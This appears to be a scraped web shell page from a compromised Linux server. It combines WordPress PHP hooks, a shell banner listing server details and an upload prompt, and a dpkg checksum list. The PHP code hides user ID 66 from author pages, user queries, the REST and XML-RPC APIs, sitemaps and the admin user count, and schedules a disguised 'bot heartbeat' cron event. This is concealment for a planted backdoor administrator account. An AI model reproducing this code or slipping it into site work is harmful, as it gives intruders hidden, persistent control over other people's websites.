add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
b9eaa416b20059ec1ceff4ea6dc88ed2 usr/bin/col 3ae284d440a6edbf09124c7d48d74db7 usr/bin/colcrt 613ac2a6a4fe5ad7a0d0be7d7ed2f72a usr/bin/colrm a3e25407e5c6ffe333157704bc690474 usr/bin/column 5acf73a93c637494f362d7f54fb05fa3 usr/bin/hexdump 6d421f584c8024fce5b99eddeb80d119 usr/bin/look 4fdc8416cb8b11bafe7038b547cc407c usr/bin/ul c1ad9e6ca492a887bc3b01dc64ee64b4 usr/bin/write 866319ca7a52f312a7ff7e0c03a552aa usr/share/bash-completion/completions/col baafdf714e300e778bcec44282ca55c1 usr/share/bash-completion/completions/colcrt 00d923213dcba1a06dcd1e8a23fe4d86 usr/share/bash-completion/completions/colrm 5cc4061c89add8d92794e6072ca3be1d usr/share/bash-completion/completions/column 7b93c9401bf575194c6ccf26c2181068 usr/share/bash-completion/completions/hexdump 910146a6dfe070a4aba5d6600b18168b usr/share/bash-completion/completions/look 6c63f8ba7f4e07902cc0e3afd3d76d57 usr/share/bash-completion/completions/ul b639849e6a778e1df305ac2b67c33d82 usr/share/bash-completion/completions/write 4e3ed275af9c214606341bc158e7acf4 usr/share/doc/bsdextrautils/copyright 288d7f24d67b1235497e812e458e297b usr/share/lintian/overrides/bsdextrautils cf0a5a8918b97f68344f936f5791f2d5 usr/share/man/man1/col.1.gz c57cdb4eafc9e05be53da299b9b85e14 usr/share/man/man1/colcrt.1.gz c01e1ba56cf78f3817b6eb6035f87107 usr/share/man/man1/colrm.1.gz a7c29645b9ab3a01f9de99ef9ff59819 usr/share/man/man1/column.1.gz 5a8dab03da8a4945f6aa999a11249e21 usr/share/man/man1/hexdump.1.gz 49065638e86b4bfbe88392a843bb9bd9 usr/share/man/man1/look.1.gz e9c759a3441bfc06aca59ae2f543e434 usr/share/man/man1/ul.1.gz 2e3916e6cca0965cbf67b4680daeffc4 usr/share/man/man1/write.1.gz